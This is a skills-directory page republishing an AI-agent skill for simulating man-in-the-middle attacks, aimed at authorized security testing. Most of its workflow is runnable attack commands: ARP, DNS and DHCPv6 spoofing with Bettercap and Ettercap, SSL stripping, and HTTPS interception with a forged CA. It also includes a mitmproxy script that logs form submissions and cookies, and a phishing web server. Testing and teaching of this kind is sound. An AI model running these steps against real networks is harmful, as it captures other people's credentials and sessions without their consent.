Agent skill

Conducting Man In The Middle Attack Simulation

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement…

Apache-2.0Auto-check: notesSecurity

Install Conducting Man In The Middle Attack Simulation

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill conducting-man-in-the-middle-attack-simulation -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills conducting-man-in-the-middle-attack-simulation --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/conducting-man-in-the-middle-attack-simulation .claude/skills/conducting-man-in-the-middle-attack-simulation && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
conducting-man-in-the-middle-attack-simulation
GitHub stars
34k
Token cost
~3k tokens
SKILL.md length
661 words
Files
4 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement…

  • Works in 6 steps: Set Up the Attack Environment → Execute ARP-Based MITM with Bettercap → Intercept HTTP/HTTPS Traffic with… → …
  • Security work in your project
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder; calls openssl, python3 and curl

What it does

Conducting Man In The Middle Attack Simulation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement, certificate validation, and detection capabilities.

Its SKILL.md is about 3k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Security. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Security work in your project

Example prompts

  • “Use the conducting-man-in-the-middle-attack-simulation skill to simulate man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in…”
  • “/conducting-man-in-the-middle-attack-simulation”

Requirements

  • Python 3

Workflow steps

6 steps, taken from the step headings in SKILL.md.

  1. Set Up the Attack Environment
  2. Execute ARP-Based MITM with Bettercap
  3. Intercept HTTP/HTTPS Traffic with mitmproxy
  4. Perform DNS Spoofing and DHCP Attacks
  5. Validate Detection and Test Controls
  6. Clean Up and Document Results

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • openssl
    • python3
    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Conducting Man In The Middle Attack Simulation loads about 3k tokens when it runs, and up to ~3.5k if it reads all its reference files. Until then it costs about 72 tokens; SKILL.md has 661 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~72
When it runs · the whole SKILL.md, loaded when a task matches
~3k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: notes

The automated check noted patterns worth knowing about, such as sudo or a known installer.

  • NoteRuns commands with sudoSKILL.md:56
    sudo sysctl -w net.ipv4.ip_forward=1
  • NoteRuns commands with sudoSKILL.md:57
    sudo sysctl -w net.ipv6.conf.all.forwarding=1
  • NoteRuns commands with sudoSKILL.md:60
    sudo sysctl -w net.ipv4.conf.all.send_redirects=0
  • NoteRuns commands with sudoSKILL.md:68
    sudo bettercap -iface eth0 -eval "net.probe on; sleep 10; net.show; quit"
  • NoteRuns commands with sudoSKILL.md:75
    sudo bettercap -iface eth0
  • NoteRuns commands with sudoSKILL.md:114
    sudo mitmproxy --mode transparent --set confdir=~/.mitmproxy \
  • NoteRuns commands with sudoSKILL.md:118
    sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
  • NoteRuns commands with sudoSKILL.md:119
    sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
  • NoteRuns commands with sudoSKILL.md:145
    sudo mitmproxy --mode transparent -s extract_creds.py -w mitm_capture.flow
  • NoteRuns commands with sudoSKILL.md:152
    sudo tee /etc/ettercap/etter.dns << 'EOF'

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 661 words, ~2,952 tokens.

Download SKILL.mdSave it as .claude/skills/conducting-man-in-the-middle-attack-simulation/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
conducting-man-in-the-middle-attack-simulation
description
Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement, certificate validation, and detection capabilities.
domain
cybersecurity
subdomain
network-security
tags
network-security, mitm, bettercap, ettercap, mitmproxy
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.IR-01, DE.CM-01, ID.AM-03, PR.DS-02
mitre_attack
T1557.001, T1557.002, T1040

Conducting Man-in-the-Middle Attack Simulation

When to Use

  • Testing whether applications properly validate TLS certificates and enforce encrypted communications
  • Demonstrating the risk of cleartext protocols (HTTP, FTP, Telnet, SMTP) to organization stakeholders
  • Validating that HSTS, certificate pinning, and other anti-MITM controls are correctly implemented
  • Assessing network detection capabilities for ARP spoofing, DHCP spoofing, and DNS spoofing attacks
  • Training incident response teams to identify and respond to MITM attack indicators

Do not use on production networks without explicit written authorization and a rollback plan, against systems you do not own or have permission to test, or for intercepting communications of uninvolved third parties.

Prerequisites

  • Written authorization specifying in-scope targets and approved MITM techniques
  • Bettercap 2.x, Ettercap, and mitmproxy installed on the attacker machine
  • Layer 2 access to the same network segment as target hosts
  • Custom CA certificate for TLS interception testing (generated specifically for the engagement)
  • Wireshark or tshark for capturing and verifying intercepted traffic
  • Isolated lab environment or approved production test window with rollback procedures

Workflow

Step 1: Set Up the Attack Environment
bash
# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1
sudo sysctl -w net.ipv6.conf.all.forwarding=1

# Disable ICMP redirects
sudo sysctl -w net.ipv4.conf.all.send_redirects=0

# Generate a CA certificate for TLS interception
openssl genrsa -out mitm-ca.key 4096
openssl req -new -x509 -days 30 -key mitm-ca.key -out mitm-ca.crt \
  -subj "/CN=MITM Test CA/O=Security Assessment/C=US"

# Discover hosts on the target network
sudo bettercap -iface eth0 -eval "net.probe on; sleep 10; net.show; quit"
Step 2: Execute ARP-Based MITM with Bettercap
bash
# Start Bettercap with interactive mode
sudo bettercap -iface eth0

# Enable network probing to discover hosts
> net.probe on

# Display discovered hosts
> net.show

# Set target (victim: 192.168.1.50, gateway: 192.168.1.1)
> set arp.spoof.targets 192.168.1.50
> set arp.spoof.fullduplex true

# Start ARP spoofing
> arp.spoof on

# Enable HTTP proxy for traffic inspection
> set http.proxy.sslstrip true
> http.proxy on

# Enable HTTPS proxy with certificate interception
> set https.proxy.certificate mitm-ca.crt
> set https.proxy.key mitm-ca.key
> https.proxy on

# Enable DNS spoofing for specific domains
> set dns.spoof.domains example.com,*.example.com
> set dns.spoof.address 192.168.1.99
> dns.spoof on

# Enable credential sniffer
> set net.sniff.verbose true
> set net.sniff.filter "tcp port 80 or tcp port 21 or tcp port 110"
> net.sniff on
Step 3: Intercept HTTP/HTTPS Traffic with mitmproxy
bash
# Start mitmproxy as transparent proxy
sudo mitmproxy --mode transparent --set confdir=~/.mitmproxy \
  --set ssl_insecure=true -w mitm_capture.flow

# Configure iptables to redirect traffic through mitmproxy
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080

# Use mitmproxy scripting for automated credential extraction
cat > extract_creds.py << 'PYEOF'
"""mitmproxy script to extract credentials from intercepted traffic."""
from mitmproxy import http
import json

def request(flow: http.HTTPFlow):
    if flow.request.method == "POST":
        content_type = flow.request.headers.get("content-type", "")
        if "form" in content_type or "json" in content_type:
            with open("captured_forms.log", "a") as f:
                f.write(f"URL: {flow.request.pretty_url}\n")
                f.write(f"Data: {flow.request.get_text()}\n")
                f.write("---\n")

def response(flow: http.HTTPFlow):
    # Log authentication cookies
    if "set-cookie" in flow.response.headers:
        with open("captured_cookies.log", "a") as f:
            f.write(f"URL: {flow.request.pretty_url}\n")
            f.write(f"Cookie: {flow.response.headers['set-cookie']}\n")
            f.write("---\n")
PYEOF

sudo mitmproxy --mode transparent -s extract_creds.py -w mitm_capture.flow
Step 4: Perform DNS Spoofing and DHCP Attacks
bash
# DNS spoofing with Ettercap
sudo tee /etc/ettercap/etter.dns << 'EOF'
# Redirect target domain to attacker's web server
example.com      A   192.168.1.99
*.example.com    A   192.168.1.99
www.example.com  A   192.168.1.99
EOF

sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof /192.168.1.50// /192.168.1.1//

# DHCP spoofing with Bettercap (offer rogue DHCP with attacker as gateway)
sudo bettercap -iface eth0
> set dhcp6.spoof.domains example.com
> dhcp6.spoof on

# Set up a phishing page on the attacker machine
sudo python3 -m http.server 80 --directory /var/www/phishing/
Step 5: Validate Detection and Test Controls
bash
# Verify certificate pinning is working on the target application
# If the app rejects the MITM CA, certificate pinning is effective
# Check the target machine for certificate errors

# Test HSTS enforcement
# If browser refuses HTTP connection after initial HTTPS, HSTS is working
curl -v -k -L http://example.com 2>&1 | grep -i "strict-transport-security"

# Verify IDS detection of ARP spoofing
# Check Snort/Suricata alerts for ARP anomalies
grep -i "arp" /var/log/snort/alert_fast.txt

# Check if switch detected the attack (DAI logs)
# On Cisco switch: show ip arp inspection log

# Test network monitoring tools
# Verify that Zeek generated appropriate notices
cat /opt/zeek/logs/current/notice.log | zeek-cut note msg

# Capture evidence of successful/failed interception
tshark -i eth0 -f "host 192.168.1.50" -w mitm_evidence.pcapng -a duration:300
Step 6: Clean Up and Document Results
bash
# Stop all MITM attacks
# In Bettercap:
> arp.spoof off
> http.proxy off
> https.proxy off
> dns.spoof off
> quit

# Restore IP forwarding
sudo sysctl -w net.ipv4.ip_forward=0

# Remove iptables rules
sudo iptables -t nat -F PREROUTING

# Verify ARP tables are restored on target hosts
# The target should re-learn correct MAC addresses via normal ARP

# Force ARP cache refresh (from target machine)
# arp -d 192.168.1.1 && ping -c 1 192.168.1.1

# Remove test CA certificate from any systems where it was installed
# Remove capture files containing sensitive data per engagement agreement

# Generate documentation
echo "MITM Simulation completed at $(date)" >> mitm_report.txt
sha256sum mitm_capture.flow mitm_evidence.pcapng >> mitm_report.txt

Key Concepts

TermDefinition
Man-in-the-Middle (MITM)Attack where the adversary secretly intercepts and potentially alters communication between two parties who believe they are communicating directly
SSL StrippingDowngrade attack that converts HTTPS connections to HTTP by intercepting the initial HTTP request before the TLS upgrade, bypassing encryption
HSTS (HTTP Strict Transport Security)Browser security policy that forces HTTPS connections and prevents SSL stripping by caching the requirement for encrypted connections
Certificate PinningApplication security control that validates server certificates against a pre-configured set of trusted certificates, detecting MITM proxy certificates
ARP Cache PoisoningLayer 2 attack technique that corrupts the ARP cache of target hosts to redirect traffic through the attacker's machine
Transparent ProxyProxy that intercepts traffic without requiring client-side configuration, typically using iptables REDIRECT rules to capture traffic destined for standard ports

Tools & Systems

  • Bettercap 2.x: Swiss-army knife for network attacks supporting ARP/DNS/DHCP spoofing, HTTP/HTTPS proxying, and credential sniffing with a modular architecture
  • mitmproxy: Interactive TLS-capable proxy for intercepting, inspecting, and modifying HTTP/HTTPS traffic with Python scripting support
  • Ettercap: Legacy MITM tool supporting ARP spoofing, DNS spoofing, and plugin-based traffic manipulation
  • sslstrip: Tool that implements SSL stripping attacks by proxying HTTP-to-HTTPS redirects and serving downgraded HTTP versions
  • Wireshark: Packet analyzer for verifying traffic interception and capturing evidence of successful or failed MITM attempts
Show full SKILL.md (238 more words)Show less

Common Scenarios

Scenario: Testing HTTPS Enforcement on an Internal Web Application

Context: A development team claims their internal web application enforces HTTPS with HSTS and certificate pinning. The security team needs to verify these controls during an authorized assessment. The application runs on 10.10.20.50 and is accessed by workstations on the 10.10.1.0/24 VLAN.

Approach:

  1. Set up Bettercap on the same VLAN and ARP-spoof a test workstation (10.10.1.100)
  2. Enable SSL stripping via Bettercap's HTTP proxy to test whether the application can be downgraded to HTTP
  3. Enable HTTPS interception with a test CA certificate to test certificate validation
  4. Attempt to access the application from the test workstation and observe whether the browser or application rejects the connection
  5. Verify that HSTS headers are present and have appropriate max-age values
  6. Document that the thick client does not implement certificate pinning (accepts the MITM CA) while the web browser properly rejects it due to HSTS preload
  7. Recommend implementing certificate pinning in the thick client application

Pitfalls:

  • Forgetting to enable IP forwarding, causing a denial of service instead of transparent interception
  • Testing SSL stripping on an application with HSTS preloaded in the browser and concluding HSTS works, when a fresh browser instance might be vulnerable
  • Not cleaning up ARP spoofing after testing, causing intermittent connectivity issues for the target
  • Running mitmproxy without the transparent mode flag, requiring manual proxy configuration that changes the test conditions

Output Format

## MITM Simulation Report

**Test ID**: MITM-2024-001
**Date**: 2024-03-15 14:00-16:00 UTC
**Target Application**: https://app.internal.corp (10.10.20.50)
**Test Workstation**: 10.10.1.100
**Attacker Machine**: 10.10.1.99

### Control Validation Results

| Control | Status | Details |
|---------|--------|---------|
| HTTPS Redirect | PASS | HTTP requests redirect to HTTPS with 301 |
| HSTS Header | PASS | max-age=31536000; includeSubDomains; preload |
| SSL Stripping (Browser) | BLOCKED | HSTS prevents downgrade in Chrome/Firefox |
| SSL Stripping (Thick Client) | VULNERABLE | Client follows HTTP redirect without HSTS |
| Cert Pinning (Browser) | N/A | Standard CA validation only |
| Cert Pinning (Thick Client) | VULNERABLE | Accepts MITM CA without validation |
| IDS Detection | PASS | Snort generated ARP spoof alert in 12 seconds |

### Recommendations
1. Implement certificate pinning in the thick client (high priority)
2. Add HSTS preload list submission for the domain
3. Enable DAI on access-layer switches for Layer 2 protection
4. Configure application to reject connections from non-pinned certificates

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/conducting-man-in-the-middle-attack-simulation of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

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Questions about Conducting Man In The Middle Attack Simulation

What does Conducting Man In The Middle Attack Simulation do?

Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement…. Conducting Man In The Middle Attack Simulation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement, certificate validation, and detection capabilities.

When should I use Conducting Man In The Middle Attack Simulation?

Conducting Man In The Middle Attack Simulation fits situations like: security work in your project.

How do I install Conducting Man In The Middle Attack Simulation in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill conducting-man-in-the-middle-attack-simulation -a claude-code`. Or copy the skill folder (skills/conducting-man-in-the-middle-attack-simulation in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/conducting-man-in-the-middle-attack-simulation in your project. Claude Code loads it when a task matches its description.

How do I install Conducting Man In The Middle Attack Simulation in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill conducting-man-in-the-middle-attack-simulation -a codex`. Or copy the skill folder (skills/conducting-man-in-the-middle-attack-simulation in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/conducting-man-in-the-middle-attack-simulation in your project. Codex loads it when a task matches its description.

Can I use Conducting Man In The Middle Attack Simulation in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill conducting-man-in-the-middle-attack-simulation -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/conducting-man-in-the-middle-attack-simulation, .gemini/skills/conducting-man-in-the-middle-attack-simulation, .github/skills/conducting-man-in-the-middle-attack-simulation and .opencode/skills/conducting-man-in-the-middle-attack-simulation in your project.

What does Conducting Man In The Middle Attack Simulation need to run?

Going by SKILL.md and its folder, Conducting Man In The Middle Attack Simulation needs Python for the scripts in its folder and the command-line tools its instructions call (openssl, python3 and curl). Our summary lists: Python 3.

Does Conducting Man In The Middle Attack Simulation access the network?

SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.

Is Conducting Man In The Middle Attack Simulation safe to install?

Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Conducting Man In The Middle Attack Simulation use?

Conducting Man In The Middle Attack Simulation is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Conducting Man In The Middle Attack Simulation use?

About 3k tokens (SKILL.md is roughly 12k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 557 tokens, read only when the agent opens those files.

What are the alternatives to Conducting Man In The Middle Attack Simulation?

Skills that share tags, products or a category with Conducting Man In The Middle Attack Simulation: Kubernetes Network Security Audit (kubeshark/kubeshark, 12k stars), Google Cloud PAM Helper (google/skills, 21k stars), Cyberowlai (karimhabush/cyberowl, 263 stars) and DefectDojo Vulnerability Management (AgentSecOps/SecOpsAgentKit, 220 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Conducting Man In The Middle Attack Simulation?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.